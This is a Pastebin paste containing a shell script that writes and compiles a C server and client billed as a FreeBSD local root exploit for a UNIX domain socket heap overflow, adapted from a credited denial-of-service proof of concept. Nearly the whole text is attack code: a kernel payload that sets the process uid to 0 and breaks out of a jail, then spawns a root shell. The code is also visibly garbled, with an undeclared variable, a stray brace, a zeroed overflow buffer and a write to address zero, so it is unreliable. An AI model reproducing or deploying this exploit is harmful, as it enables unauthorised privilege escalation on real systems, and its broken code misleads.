Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/sh
- # HaqNET PROP3R localroot exploit for the UNIX domain socket overfl0w
- # fbsd-uipc-heapx.sh -Original DoS by Shaun Colley <scolley@ioactive.com> 29/09/11
- # PoC local DoS for the Freebsd UNiX domain sockets heap overflow.
- # This was tested on Freebsd 8.2-RELEASE && 7.3-RELEASE
- # see advisory & patches for details:
- # http://www.securityfocus.com/archive/1/519864/30/0/threaded
- # PoC will usually result in a kernel panic with a read access
- # violation at 0x616161XX but sometimes the kernel will not crash straight
- # away (particularly if you shorten the length of 'sun_path' -- try 140 bytes)
- # and your uid (see output of `id`) may have been modified to the
- # decimal equivalent of 0x61616161 during the heap smash
- ###############################################################################
- ################ debug and change how you like it.. DONT change sun_path buffer,it is setup right
- ################ should NOT d0s local box
- ################ feedback? HaqNET.NET // SSL IRCD
- # server
- cat > srv.c << _EOF
- #include <stdio.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <sys/socket.h>
- #include <sys/un.h>
- #include <sys/types.h>
- #include <sys/event.h>
- #include <fcntl.h>
- #include <sys/param.h>
- #include <sys/linker.h>
- #include <sys/proc.h>
- #include <string.h>
- volatile int gotroot = 0;
- static void kernelcode(void) {
- struct thread *thread;
- gotroot = 1;
- asm(
- "movl %%fs:0, %0"
- : "=r"(thread)
- );
- thread->td_proc->p_ucred->cr_uid = 0;
- thread->td_proc->p_ucred->cr_prison = NULL; // jaillll break!
- return;
- }
- static void code_end(void) {
- return;
- }
- struct socky {
- short sun_family;
- char sun_path[140];
- };
- int connhandler(int incoming) {
- char buffer[256];
- int n = 0;
- n = read(incoming, buffer, 256);
- buffer[n] = 0;
- printf("%s\n", buffer);
- n = sprintf(buffer, "~ FreeBSD uIPC socket heap overflow explo1t - HaqNET ~");
- write(incoming, buffer, n);
- //close(incoming);
- return 0;
- }
- int main(void) {
- struct socky overfl0w;
- int sock, incoming;
- socklen_t alen;
- pid_t child;
- char buf[160];
- sock = socket(PF_UNIX, SOCK_STREAM, 0);
- if(sock < 0) {
- printf("socket fail\n");
- return 1;
- }
- memset(&overfl0w, 0, sizeof(struct socky));
- overfl0w.sun_family = AF_UNIX;
- //memset(buf, 0x61, sizeof(buf)); // 0x61 = crash c0de
- memset(buf, 0, sizeof(buf));
- buf[sizeof(buf)-1] = 0x00;
- strcpy(overfl0w.sun_path, buf);
- memcpy(0, &kernelcode, &code_end - &kernelcode);
- if(bind(sock, (struct sockaddr *)&overfl0w,sizeof(struct socky)) != 0) {
- printf("bind fail\n");
- return 1;
- }
- if(listen(sock, 5) != 0) {
- printf("listen fail\n");
- return 1;
- }
- while((incoming = accept(sock, (struct sockaddr *)&overfl0w, &alen)) > -1) {
- child = fork();
- if(child == 0) {
- while (!gotroot && i++ < 4000)
- usleep(100);
- setuid(0);
- execl("/bin/sh", "/bin/sh", NULL);
- return connhandler(incoming);
- //setuid(0);
- //execl("/bin/sh", "/bin/sh", NULL);
- }
- //close(incoming);
- }
- close(sock);
- return 0;
- }
- }
- _EOF
- gcc srv.c -o srv
- #client
- cat > cli.c << _EOF
- #include <stdio.h>
- #include <unistd.h>
- #include <sys/socket.h>
- #include <sys/un.h>
- #include <string.h>
- #include <sys/linker.h>
- #include <sys/proc.h>
- struct socky {
- short sun_family;
- char sun_path[140];
- };
- int main(void) {
- int i;
- struct socky overfl0w;
- int sock, n;
- char buffer[256], buf[160];
- sock = socket(PF_UNIX, SOCK_STREAM, 0);
- if(sock < 0) {
- printf("socket fail\n");
- return 1;
- }
- memset(&overfl0w, 0, sizeof(struct sockaddr_un));
- overfl0w.sun_family = AF_UNIX;
- //memset(buf, 0x61, sizeof(buf)); // 0x61 = crash / local d0s
- memset(buf, 0, sizeof(buf));
- buf[sizeof(buf)-1] = 0x00;
- strcpy(overfl0w.sun_path, buf);
- //memcpy(0, &kernelcode, &code_end - &kernelcode);
- if(connect(sock,(struct sockaddr *)&overfl0w,sizeof(struct socky)) != 0) {
- printf("connect fail\n");
- return 1;
- }
- //n = snprintf(buffer, 256, "panic");
- write(sock, buffer, n);
- n = read(sock, buffer, 256);
- buffer[n] = 0;
- printf("%s\n", buffer);
- //setuid(0);
- //execl("/bin/sh", "/bin/sh", NULL);
- //close(sock);
- return 0;
- }
- _EOF
- gcc cli.c -o cli
- ./cli &
- ./srv
- #if(!debug) {
- #printf("listen fail\n");
- #return 1;
- #}
- #id
- #whoami
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement